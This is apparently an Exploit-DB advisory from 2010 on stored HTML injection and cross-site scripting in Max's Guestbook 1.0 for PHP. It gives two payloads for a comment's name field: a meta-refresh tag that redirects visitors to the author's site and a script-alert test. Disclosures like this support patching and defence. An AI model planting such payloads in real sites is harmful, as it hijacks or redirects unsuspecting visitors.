Max's Guestbook - HTML Injection / Cross-Site Scripting

Author: MiND C0re
type: webapps
platform: php
port: 
date_added: 2010-08-29 
date_updated: 2010-09-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commaxGuestbook.zip

================================================================
#                       In the name of ALLAH !                       #
======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __   __   /_  __/  #
#     / ___/  \ \  / /     / /     #
#    (__  )     \ \/ /     / /      #
#   /____/     \__/    /_/       #
#################################
########################################################################
# Name: Max's Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.phpf1.com/download.html?item=18
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi...
# Contact: SlaSHMiND@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################


[~] HTML Injection Vuln . :
Add A New Comment And The exploit is in Name :)
<meta http-equiv="refresh" content="0;url=http://sa-virus.com/" />
( thats redirecting to sa-virus.com )


[~] Xss Vuln. :
Add A New Comment And The exploit is in Name :)
<script>alert('MiND - Sa-ViRuS.CoM')</script>



Peace